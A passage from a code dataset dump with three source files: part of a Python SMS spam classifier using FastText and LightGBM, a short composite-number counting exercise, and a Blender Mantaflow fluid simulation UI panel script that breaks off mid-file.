SnowballStemmer\nfrom string import punctuation\n\nimport re # 正则匹配\nstop_words = set(stopwords.words('english'))\nnon_words = list(punctuation)\n\n\n# 词形、词干还原\n# from nltk.stem import WordNetLemmatizer\n# wnl = WordNetLemmatizer()\nstemmer = SnowballStemmer('english')\ndef stem_tokens(tokens, stemmer):\n stems = []\n for token in tokens:\n stems.append(stemmer.stem(token))\n return stems\n\n\n### 清除非英文词汇并替换数值x\ndef clean_non_english_xdig(txt,isstem=True, gettok=True):\n txt = re.sub('[0-9]', 'x', txt) # 去数字替换为x\n txt = txt.lower() # 统一小写\n txt = re.sub('[^a-zA-Z]', ' ', txt) #去除非英文字符并替换为空格\n word_tokens = word_tokenize(txt) # 分词\n if not isstem: #是否做词干还原\n filtered_word = [w for w in word_tokens if not w in stop_words] # 删除停用词\n else:\n filtered_word = [stemmer.stem(w) for w in word_tokens if not w in stop_words] # 删除停用词及词干还原\n if gettok: #返回为字符串或分词列表\n return filtered_word\n else:\n return \" \".join(filtered_word)\n\n\n# In[20]:\n\n\n# 数据清洗\nspam_df['token'] = spam_df.message.apply(lambda x:clean_non_english_xdig(x))\n\n# 标签整数编码\nspam_df['label'] = (spam_df.label=='spam').astype(int)\n\nspam_df.head(3)\n\n\n# In[5]:\n\n\n# 训练词向量 Fasttext embed模型\nfrom gensim.models import FastText,word2vec\n\n\nfmodel = FastText(spam_df.token, size=100,sg=1, window=3, min_count=1, iter=10, min_n=3, max_n=6,word_ngrams=1,workers=12) \nprint(\"输出hello的词向量\",fmodel.wv['hello']) # 词向量\n# fmodel.save('./data/fasttext100dim')\n\n\n# In[12]:\n\n\nfmodel = FastText.load('./data/fasttext100dim')\n\n\n\n#对每个句子的所有词向量取均值,来生成一个句子的vector\ndef build_sentence_vector(sentence,w2v_model,size=100):\n sen_vec=np.zeros((size,))\n count=0\n for word in sentence:\n try:\n sen_vec+=w2v_model[word]#.reshape((1,size))\n count+=1\n except KeyError:\n continue\n if count!=0:\n sen_vec/=count\n return sen_vec\n\n# 句向量\nsents_vec = []\nfor sent in spam_df['token']:\n sents_vec.append(build_sentence_vector(sent,fmodel,size=100))\n \nprint(len(sents_vec))\n\n\n# In[38]:\n\n\n### 训练文本分类模型\nfrom sklearn.model_selection import train_test_split\nfrom lightgbm import LGBMClassifier\nfrom sklearn.linear_model import LogisticRegression\n\ntrain_x, test_x, train_y, test_y = train_test_split(sents_vec, spam_df.label,test_size=0.2,shuffle=True,random_state=42)\nresult = []\nclf = LGBMClassifier(class_weight='balanced',n_estimators=300, num_leaves=64, reg_alpha= 1,reg_lambda= 1,random_state=42)\n#clf = LogisticRegression(class_weight='balanced',random_state=42)\n\n\nclf.fit(train_x,train_y)\n\nimport pickle\n# 保存模型\n# pickle.dump(clf, open('./saved_models/spam_clf.pkl', 'wb'))\n\n# 加载模型\nmodel = pickle.load(open('./saved_models/spam_clf.pkl', 'rb'))\n\n\n# In[40]:\n\n\nfrom sklearn.metrics import auc,roc_curve,f1_score,precision_score,recall_score\ndef model_metrics(model, x, y,tp='auc'):\n \"\"\" 评估 \"\"\"\n yhat = model.predict(x)\n yprob = model.predict_proba(x)[:,1]\n fpr,tpr,_ = roc_curve(y, yprob,pos_label=1)\n metrics = {'AUC':auc(fpr, tpr),'KS':max(tpr-fpr),\n 'f1':f1_score(y,yhat),'P':precision_score(y,yhat),'R':recall_score(y,yhat)}\n \n roc_auc = auc(fpr, tpr)\n\n plt.plot(fpr, tpr, 'k--', label='ROC (area = {0:.2f})'.format(roc_auc), lw=2)\n\n plt.xlim([-0.05, 1.05]) # 设置x、y轴的上下限,以免和边缘重合,更好的观察图像的整体\n plt.ylim([-0.05, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate') # 可以使用中文,但需要导入一些库即字体\n plt.title('ROC Curve')\n plt.legend(loc=\"lower right\")\n\n\n return metrics\n\nprint('train ',model_metrics(clf, train_x, train_y,tp='ks'))\nprint('test ',model_metrics(clf, test_x,test_y,tp='ks'))\n\n\n\n\n\n","repo_name":"aialgorithm/Blog","sub_path":"projects/一文概览NLP算法(Python)/sms_clf_models.py","file_name":"sms_clf_models.py","file_ext":"py","file_size_in_byte":4634,"program_lang":"python","lang":"en","doc_type":"code","stars":588,"dataset":"github-code","pt":"16"} +{"seq_id":"19154441001","text":"def solution(n):\r\n answer = 0\r\n\r\n for i in range(4, n+1, 1):\r\n n_list = []\r\n for j in range(1, i+1, 1):\r\n if (i % j == 0):\r\n n_list.append(j)\r\n if (len(n_list) >= 3):\r\n answer += 1 \r\n return answer","repo_name":"minu0508/Algorithm","sub_path":"Python/Programmers/Level_0/합성수 찾기.py","file_name":"합성수 찾기.py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13066080706","text":"# ##### BEGIN GPL LICENSE BLOCK #####\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software Foundation,\n# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.\n#\n# ##### END GPL LICENSE BLOCK #####\n\n# <pep8 compliant>\nimport bpy\nfrom bpy.types import Panel, Menu\n\nfrom .properties_physics_common import (\n point_cache_ui,\n effector_weights_ui,\n)\n\nclass MANTA_MT_presets(Menu):\n bl_label = \"Fluid Presets\"\n preset_subdir = \"mantaflow\"\n preset_operator = \"script.execute_preset\"\n draw = Menu.draw_preset\n\nclass PhysicButtonsPanel:\n bl_space_type = 'PROPERTIES'\n bl_region_type = 'WINDOW'\n bl_context = \"physics\"\n\n @classmethod\n def poll(cls, context):\n ob = context.object\n rd = context.scene.render\n return (ob and ob.type == 'MESH') and (rd.engine in cls.COMPAT_ENGINES) and (context.smoke)\n\n\nclass PHYSICS_PT_manta(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Simulation\"\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n def draw(self, context):\n layout = self.layout\n\n if not bpy.app.build_options.manta:\n layout.label(\"Built without Fluid Mantaflow modifier\")\n return\n\n md = context.smoke\n ob = context.object\n scene = context.scene\n\n layout.row().prop(md, \"smoke_type\", expand=True)\n\n if md.smoke_type == 'DOMAIN':\n domain = md.domain_settings\n\n # Deactivate UI if guiding is enabled but not baked yet\n layout.active = not (domain.use_guiding and not domain.cache_baked_guiding and (domain.guiding_source == \"EFFECTOR\" or (domain.guiding_source == \"DOMAIN\" and not domain.guiding_parent)))\n\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n baked_any = domain.cache_baked_data or domain.cache_baked_mesh or domain.cache_baked_particles or domain.cache_baked_noise or domain.cache_baked_guiding\n baked_data = domain.cache_baked_data\n\n row = layout.row()\n row.enabled = not baking_any and not baked_data\n row.prop(domain, \"smoke_domain_type\", expand=False)\n\n split = layout.split()\n split.enabled = not baking_any and not baked_data\n split.label(text=\"Border collisions:\")\n\n split = layout.split()\n split.enabled = not baking_any and not baked_data\n\n col = split.column()\n col.prop(domain, \"use_collision_border_front\", text=\"Front\")\n col.prop(domain, \"use_collision_border_back\", text=\"Back\")\n\n col = split.column()\n col.prop(domain, \"use_collision_border_right\", text=\"Right\")\n col.prop(domain, \"use_collision_border_left\", text=\"Left\")\n\n col = split.column()\n col.prop(domain, \"use_collision_border_top\", text=\"Top\")\n col.prop(domain, \"use_collision_border_bottom\", text=\"Bottom\")\n\n split = layout.split()\n split.enabled = not baking_any and not baked_data\n\n col = split.column(align=True)\n col1 = col.column(align=True)\n col2 = col.column(align=True)\n col1.label(text=\"Domain:\")\n col2.enabled = not baked_any\n col2.prop(domain, \"resolution_max\", text=\"Resolution\")\n col.prop(domain, \"use_adaptive_stepping\", text=\"Adaptive stepping\")\n col.prop(domain, \"time_scale\", text=\"Time\")\n col.prop(domain, \"cfl_condition\", text=\"CFL\")\n\n col = split.column()\n if scene.use_gravity:\n col.label(text=\"Use Scene Gravity\", icon='SCENE_DATA')\n sub = col.column()\n sub.enabled = False\n sub.prop(domain, \"gravity\", text=\"\")\n else:\n col.label(text=\"Gravity:\")\n col.prop(domain, \"gravity\", text=\"\")\n # TODO (sebas): Clipping var useful for manta openvdb caching?\n # col.prop(domain, \"clipping\")\n\n if domain.smoke_domain_type in {'GAS'}:\n split = layout.split()\n split.enabled = not baking_any and not baked_data\n\n col = split.column(align=True)\n col.label(text=\"Smoke:\")\n col.prop(domain, \"alpha\")\n col.prop(domain, \"beta\", text=\"Temp. Diff.\")\n col.prop(domain, \"vorticity\")\n col.prop(domain, \"use_dissolve_smoke\", text=\"Dissolve\")\n sub = col.column()\n sub.active = domain.use_dissolve_smoke\n sub.prop(domain, \"dissolve_speed\", text=\"Time\")\n sub.prop(domain, \"use_dissolve_smoke_log\", text=\"Slow\")\n\n col = split.column(align=True)\n col.label(text=\"Fire:\")\n col.prop(domain, \"burning_rate\")\n col.prop(domain, \"flame_smoke\")\n col.prop(domain, \"flame_vorticity\")\n col.prop(domain, \"flame_ignition\")\n col.prop(domain, \"flame_max_temp\")\n col.prop(domain, \"flame_smoke_color\")\n\n if domain.smoke_domain_type in {'LIQUID'}:\n split = layout.split()\n\n col = split.column(align=True)\n col1 = col.column()\n col1.enabled = not baking_any and not baked_data\n col1.label(text=\"Liquid:\")\n col1.prop(domain, \"particle_maximum\")\n col1.prop(domain, \"particle_minimum\")\n col2 = col.column()\n col2.enabled = not baking_any\n col2.prop(domain, \"use_flip_particles\", text=\"Show FLIP\")\n\n col = split.column(align=True)\n col.enabled = not baking_any and not baked_data\n col.label()\n col.prop(domain, \"particle_number\")\n col.prop(domain, \"particle_band_width\")\n col.prop(domain, \"particle_randomness\")\n\n split = layout.split()\n bake_incomplete = (domain.cache_frame_pause_data < domain.cache_frame_end)\n if domain.cache_baked_data and not domain.cache_baking_data and bake_incomplete:\n col = split.column()\n col.operator(\"manta.bake_data\", text=\"Resume\")\n col = split.column()\n col.operator(\"manta.free_data\", text=\"Free\")\n elif not domain.cache_baked_data and domain.cache_baking_data:\n split.operator(\"manta.pause_bake\", text=\"Pause Data\")\n elif not domain.cache_baked_data and not domain.cache_baking_data:\n split.operator(\"manta.bake_data\", text=\"Bake Data\")\n else:\n split.operator(\"manta.free_data\", text=\"Free Data\")\n\n elif md.smoke_type == 'FLOW':\n flow = md.flow_settings\n\n layout.prop(flow, \"smoke_flow_type\", expand=False)\n\n split = layout.split()\n col = split.column()\n\n col.label(text=\"Sampling:\")\n col.prop(flow, \"subframes\")\n\n col = split.column()\n\n col.label(text=\"Flow behavior:\")\n col.prop(flow, \"smoke_flow_behavior\", expand=False, text=\"\")\n\n if not flow.smoke_flow_behavior == 'OUTFLOW':\n\n split = layout.split()\n col = split.column()\n\n if flow.smoke_flow_type in {'SMOKE', 'BOTH', 'FIRE'}:\n col.label(text=\"Initial Values:\")\n if flow.smoke_flow_type in {'SMOKE', 'BOTH'}:\n col.prop(flow, \"density\")\n col.prop(flow, \"temperature\")\n if flow.smoke_flow_type in {'FIRE', 'BOTH'}:\n col.prop(flow, \"fuel_amount\")\n\n col = split.column()\n\n if flow.smoke_flow_behavior in {'INFLOW'}:\n col.prop(flow, \"use_inflow\")\n if flow.smoke_flow_type in {'SMOKE', 'BOTH', 'FIRE'}:\n col.prop(flow, \"use_absolute\")\n if flow.smoke_flow_type in {'SMOKE', 'BOTH'}:\n col.prop(flow, \"smoke_color\")\n\n elif md.smoke_type == 'EFFECTOR':\n effec = md.effec_settings\n\n layout.prop(effec, \"effec_type\")\n\n split = layout.split()\n col = split.column()\n\n col.label(text=\"Surface thickness:\")\n if effec.effec_type == \"GUIDE\":\n col.label(text=\"Velocity factor:\")\n col.label(text=\"Guiding mode:\")\n col = split.column()\n\n col.prop(effec, \"surface_distance\")\n if effec.effec_type == \"GUIDE\":\n col.prop(effec, \"velocity_factor\")\n col.prop(effec, \"guiding_mode\", text=\"\")\n\nclass PHYSICS_PT_manta_flow_source(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Source\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n return md and (md.smoke_type == 'FLOW')\n\n def draw(self, context):\n layout = self.layout\n ob = context.object\n flow = context.smoke.flow_settings\n\n split = layout.split()\n\n col = split.column()\n col.label(text=\"Flow source:\")\n col.prop(flow, \"smoke_flow_source\", expand=False, text=\"\")\n if flow.smoke_flow_source == 'MESH':\n col.prop(flow, \"surface_distance\")\n if flow.smoke_flow_type in {'SMOKE', 'BOTH', 'FIRE'}:\n col.prop(flow, \"volume_density\")\n if flow.smoke_flow_source == 'PARTICLES':\n col.prop_search(flow, \"particle_system\", ob, \"particle_systems\", text=\"\")\n col.prop(flow, \"use_particle_size\", text=\"Set Size\")\n sub = col.column()\n sub.active = flow.use_particle_size\n sub.prop(flow, \"particle_size\")\n\n col = split.column()\n col.label(text=\"Flow velocity:\")\n col.prop(flow, \"use_initial_velocity\")\n\n sub = col.column()\n sub.active = flow.use_initial_velocity\n sub.prop(flow, \"velocity_factor\")\n if flow.smoke_flow_source == 'MESH':\n sub.prop(flow, \"velocity_normal\")\n #sub.prop(flow, \"velocity_random\")\n\nclass PHYSICS_PT_manta_flow_advanced(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Flow Advanced\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n return md and (md.smoke_type == 'FLOW') and (md.flow_settings.smoke_flow_type in {'SMOKE', 'BOTH', 'FIRE'}) and (md.flow_settings.smoke_flow_source in {'MESH'})\n\n def draw(self, context):\n layout = self.layout\n ob = context.object\n flow = context.smoke.flow_settings\n\n split = layout.split()\n\n col = split.column()\n col.prop(flow, \"use_texture\")\n sub = col.column()\n sub.active = flow.use_texture\n sub.prop(flow, \"noise_texture\", text=\"\")\n sub.label(text=\"Mapping:\")\n sub.prop(flow, \"texture_map_type\", expand=False, text=\"\")\n if flow.texture_map_type == 'UV':\n sub.prop_search(flow, \"uv_layer\", ob.data, \"uv_textures\", text=\"\")\n if flow.texture_map_type == 'AUTO':\n sub.prop(flow, \"texture_size\")\n sub.prop(flow, \"texture_offset\")\n\n col = split.column()\n col.label(text=\"Vertex Group:\")\n col.prop_search(flow, \"density_vertex_group\", ob, \"vertex_groups\", text=\"\")\n\nclass PHYSICS_PT_manta_adaptive_domain(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Adaptive Domain\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n # Adaptive domain only for smoke right now\n # TODO (sebbas): Disable for now - not working with new manta cache right now\n return False #md and (md.smoke_type == 'DOMAIN') and (md.domain_settings.smoke_domain_type in {'GAS'})\n\n def draw_header(self, context):\n md = context.smoke.domain_settings\n self.layout.prop(md, \"use_adaptive_domain\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n\n domain = context.smoke.domain_settings\n layout.active = domain.use_adaptive_domain\n\n split = layout.split()\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n split.enabled = not baking_any\n\n col = split.column(align=True)\n col.label(text=\"Resolution:\")\n col.prop(domain, \"additional_res\")\n col.prop(domain, \"adapt_margin\")\n\n col = split.column(align=True)\n col.label(text=\"Advanced:\")\n col.prop(domain, \"adapt_threshold\")\n\n\nclass PHYSICS_PT_manta_quality(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Quality\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n # Disable for now. Not sure if and how render/ viewport display options needed in 2.8\n return False #md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n split = layout.split()\n\n col = split.column()\n col.label(text=\"Render Display:\")\n col.prop(domain, \"render_display_mode\", text=\"\")\n\n col = split.column()\n col.label(text=\"Viewport Display:\")\n col.prop(domain, \"viewport_display_mode\", text=\"\")\n\nclass PHYSICS_PT_manta_noise(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Noise\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (md.domain_settings.smoke_domain_type in {'GAS'})\n\n def draw_header(self, context):\n md = context.smoke.domain_settings\n domain = context.smoke.domain_settings\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n self.layout.enabled = not baking_any\n self.layout.prop(md, \"use_noise\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n # Deactivate UI if guiding is enabled but not baked yet\n layout.active = domain.use_noise and not (domain.use_guiding and not domain.cache_baked_guiding and (domain.guiding_source == \"EFFECTOR\" or (domain.guiding_source == \"DOMAIN\" and not domain.guiding_parent)))\n\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n baked_noise = domain.cache_baked_noise\n\n split = layout.split()\n split.enabled = not baking_any and not baked_noise\n\n col = split.column(align=True)\n col.prop(domain, \"noise_scale\", text=\"Upres\")\n # TODO (sebbas): Mantaflow only supports wavelet noise. Maybe get rid of noise type field.\n col.label(text=\"Noise Method:\")\n col.prop(domain, \"noise_type\", text=\"\")\n\n col = split.column(align=True)\n col.prop(domain, \"strength\")\n col.prop(domain, \"noise_pos_scale\")\n col.prop(domain, \"noise_time_anim\")\n\n split = layout.split()\n split.enabled = domain.cache_baked_data\n bake_incomplete = (domain.cache_frame_pause_noise < domain.cache_frame_end)\n if domain.cache_baked_noise and not domain.cache_baking_noise and bake_incomplete:\n col = split.column()\n col.operator(\"manta.bake_noise\", text=\"Resume\")\n col = split.column()\n col.operator(\"manta.free_noise\", text=\"Free\")\n elif not domain.cache_baked_noise and domain.cache_baking_noise:\n split.operator(\"manta.pause_bake\", text=\"Pause Noise\")\n elif not domain.cache_baked_noise and not domain.cache_baking_noise:\n split.operator(\"manta.bake_noise\", text=\"Bake Noise\")\n else:\n split.operator(\"manta.free_noise\", text=\"Free Noise\")\n\nclass PHYSICS_PT_manta_mesh(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Mesh\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (md.domain_settings.smoke_domain_type in {'LIQUID'})\n\n def draw_header(self, context):\n md = context.smoke.domain_settings\n domain = context.smoke.domain_settings\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n self.layout.enabled = not baking_any\n self.layout.prop(md, \"use_mesh\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n # Deactivate UI if guiding is enabled but not baked yet\n layout.active = domain.use_mesh and not (domain.use_guiding and not domain.cache_baked_guiding and (domain.guiding_source == \"EFFECTOR\" or (domain.guiding_source == \"DOMAIN\" and not domain.guiding_parent)))\n\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n baked_mesh = domain.cache_baked_mesh\n\n split = layout.split()\n split.enabled = not baking_any and not baked_mesh\n\n col = split.column(align=True)\n col.prop(domain, \"mesh_scale\", text=\"Upres\")\n col.prop(domain, \"particle_radius\")\n\n col = split.column(align=True)\n col.prop(domain, \"use_speed_vectors\", text=\"Speed vectors\")\n col.prop(domain, \"mesh_generator\", text=\"\")\n\n if domain.mesh_generator in {'IMPROVED'}:\n split = layout.split()\n split.enabled = not baking_any and not baked_mesh\n\n col = split.column(align=True)\n col.label(text=\"Smoothing:\")\n col.prop(domain, \"mesh_smoothen_pos\")\n col.prop(domain, \"mesh_smoothen_neg\")\n\n col = split.column(align=True)\n col.label(text=\"Concavity:\")\n col.prop(domain, \"mesh_concave_upper\")\n col.prop(domain, \"mesh_concave_lower\")\n\n # TODO (sebbas): for now just interpolate any upres grids, ie not sampling highres grids \n #col = split.column()\n #col.label(text=\"Flow Sampling:\")\n #col.prop(domain, \"highres_sampling\", text=\"\")\n\n split = layout.split()\n split.enabled = domain.cache_baked_data\n bake_incomplete = (domain.cache_frame_pause_mesh < domain.cache_frame_end)\n if domain.cache_baked_mesh and not domain.cache_baking_mesh and bake_incomplete:\n col = split.column()\n col.operator(\"manta.bake_mesh\", text=\"Resume\")\n col = split.column()\n col.operator(\"manta.free_mesh\", text=\"Free\")\n elif not domain.cache_baked_mesh and domain.cache_baking_mesh:\n split.operator(\"manta.pause_bake\", text=\"Pause Mesh\")\n elif not domain.cache_baked_mesh and not domain.cache_baking_mesh:\n split.operator(\"manta.bake_mesh\", text=\"Bake Mesh\")\n else:\n split.operator(\"manta.free_mesh\", text=\"Free Mesh\")\n\nclass PHYSICS_PT_manta_particles(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Particles\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n # TODO (sebbas): Fluid particles only enabled for liquids for now. Future update might include particles for gas domain, e.g. fire sparks.\n return md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES) and (md.domain_settings.smoke_domain_type in {'LIQUID'}) \n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n # Deactivate UI if guiding is enabled but not baked yet\n layout.active = not (domain.use_guiding and not domain.cache_baked_guiding and (domain.guiding_source == \"EFFECTOR\" or (domain.guiding_source == \"DOMAIN\" and not domain.guiding_parent)))\n\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n baked_particles = domain.cache_baked_particles\n\n split = layout.split()\n split.prop(domain, \"particle_scale\", text=\"Upres\")\n split.enabled = not baking_any and not baked_particles\n\n split = layout.split()\n split.enabled = not baking_any and not baked_particles\n\n col = split.column()\n col.prop(domain, \"use_spray_particles\", text=\"Drop\")\n sub = col.column(align=True)\n sub.active = domain.use_spray_particles\n sub.prop(domain, \"particle_droplet_threshold\", text=\"Threshold\")\n sub.prop(domain, \"particle_droplet_amount\", text=\"Generate\")\n sub.prop(domain, \"particle_droplet_life\", text=\"Life\")\n sub.prop(domain, \"particle_droplet_max\", text=\"Maximum\")\n sub2 = col.column()\n sub2.active = domain.use_spray_particles\n sub2.prop(domain, \"use_bubble_particles\", text=\"Bubble\")\n sub3 = col.column(align=True)\n sub3.active = domain.use_spray_particles and domain.use_bubble_particles\n sub3.prop(domain, \"particle_bubble_rise\", text=\"Rise\")\n sub3.prop(domain, \"particle_bubble_life\", text=\"Life\")\n sub3.prop(domain, \"particle_bubble_max\", text=\"Maximum\")\n\n col = split.column()\n col.prop(domain, \"use_foam_particles\", text=\"Float\")\n sub = col.column(align=True)\n sub.active = domain.use_foam_particles\n sub.prop(domain, \"particle_floater_amount\", text=\"Generate\")\n sub.prop(domain, \"particle_floater_life\", text=\"Life\")\n sub.prop(domain, \"particle_floater_max\", text=\"Maximum\")\n col.prop(domain, \"use_tracer_particles\", text=\"Tracer\")\n sub2 = col.column(align=True)\n sub2.active = domain.use_tracer_particles\n sub2.prop(domain, \"particle_tracer_amount\", text=\"Amount\")\n sub2.prop(domain, \"particle_tracer_life\", text=\"Life\")\n sub2.prop(domain, \"particle_tracer_max\", text=\"Maximum\")\n\n split = layout.split()\n split.enabled = domain.cache_baked_data and (domain.use_spray_particles or domain.use_bubble_particles or domain.use_foam_particles or domain.use_tracer_particles)\n bake_incomplete = (domain.cache_frame_pause_particles < domain.cache_frame_end)\n if domain.cache_baked_particles and not domain.cache_baking_particles and bake_incomplete:\n col = split.column()\n col.operator(\"manta.bake_particles\", text=\"Resume\")\n col = split.column()\n col.operator(\"manta.free_particles\", text=\"Free\")\n elif not domain.cache_baked_particles and domain.cache_baking_particles:\n split.operator(\"manta.pause_bake\", text=\"Pause Particles\")\n elif not domain.cache_baked_particles and not domain.cache_baking_particles:\n split.operator(\"manta.bake_particles\", text=\"Bake Particles\")\n else:\n split.operator(\"manta.free_particles\", text=\"Free Particles\")\n\nclass PHYSICS_PT_manta_diffusion(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Diffusion\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n # Fluid diffusion only enabled for liquids (surface tension and viscosity not relevant for smoke)\n return md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES) and (md.domain_settings.smoke_domain_type in {'LIQUID'}) \n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n # Deactivate UI if guiding is enabled but not baked yet\n layout.active = not (domain.use_guiding and not domain.cache_baked_guiding and (domain.guiding_source == \"EFFECTOR\" or (domain.guiding_source == \"DOMAIN\" and not domain.guiding_parent)))\n\n split = layout.split()\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n split.enabled = not baking_any\n\n col = split.column()\n col.label(text=\"Viscosity Presets:\")\n sub = col.row(align=True)\n sub.menu(\"MANTA_MT_presets\", text=bpy.types.MANTA_MT_presets.bl_label)\n sub.operator(\"manta.preset_add\", text=\"\", icon='ZOOMIN')\n sub.operator(\"manta.preset_add\", text=\"\", icon='ZOOMOUT').remove_active = True\n\n sub = col.column(align=True)\n sub.prop(domain, \"viscosity_base\", text=\"Base\")\n sub.prop(domain, \"viscosity_exponent\", text=\"Exponent\", slider=True)\n\n col = split.column()\n col.label(text=\"Real World Size:\")\n col.prop(domain, \"domain_size\", text=\"Meters\")\n col.label(text=\"Surface tension:\")\n col.prop(domain, \"surface_tension\", text=\"Tension\")\n\nclass PHYSICS_PT_manta_guiding(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Guiding\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES)\n\n def draw_header(self, context):\n md = context.smoke.domain_settings\n domain = context.smoke.domain_settings\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n self.layout.enabled = not baking_any\n self.layout.prop(md, \"use_guiding\", text=\"\")\n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n layout.active = domain.use_guiding\n\n baking_any = domain.cache_baking_data or domain.cache_baking_mesh or domain.cache_baking_particles or domain.cache_baking_noise or domain.cache_baking_guiding\n\n split = layout.split()\n split.enabled = not baking_any\n\n col = split.column(align=True)\n col.enabled = not domain.cache_baked_guiding\n col.label(text=\"Velocity source:\")\n col.prop(domain, \"guiding_source\", text=\"\")\n if domain.guiding_source == \"DOMAIN\":\n col.label(text=\"Guiding parent:\")\n col.prop(domain, \"guiding_parent\")\n\n col = split.column(align=True)\n col.enabled = not domain.cache_baked_data\n col.label(text=\"Simulation parameter:\")\n col.prop(domain, \"guiding_alpha\", text=\"Weight\")\n col.prop(domain, \"guiding_beta\", text=\"Size\")\n col.prop(domain, \"guiding_vel_factor\", text=\"Factor\")\n\n if domain.guiding_source == \"EFFECTOR\":\n split = layout.split()\n bake_incomplete = (domain.cache_frame_pause_guiding < domain.cache_frame_end)\n if domain.cache_baked_guiding and not domain.cache_baking_guiding and bake_incomplete:\n col = split.column()\n col.operator(\"manta.bake_guiding\", text=\"Resume\")\n col = split.column()\n col.operator(\"manta.free_guiding\", text=\"Free\")\n elif not domain.cache_baked_guiding and domain.cache_baking_guiding:\n split.operator(\"manta.pause_bake\", text=\"Pause Guiding\")\n elif not domain.cache_baked_guiding and not domain.cache_baking_guiding:\n split.operator(\"manta.bake_guiding\", text=\"Bake Guiding\")\n else:\n split.operator(\"manta.free_guiding\", text=\"Free Guiding\")\n\nclass PHYSICS_PT_manta_groups(PhysicButtonsPanel, Panel):\n bl_label = \"Fluid Groups\"\n bl_options = {'DEFAULT_CLOSED'}\n COMPAT_ENGINES = {'BLENDER_RENDER'}\n\n @classmethod\n def poll(cls, context):\n md = context.smoke\n rd = context.scene.render\n return md and (md.smoke_type == 'DOMAIN') and (rd.engine in cls.COMPAT_ENGINES)\n\n def draw(self, context):\n layout = self.layout\n domain = context.smoke.domain_settings\n\n split = layout.split()\n\n col = split.column()\n col.label(text=\"Flow Group:\")\n col.prop(domain, \"fluid_group\", 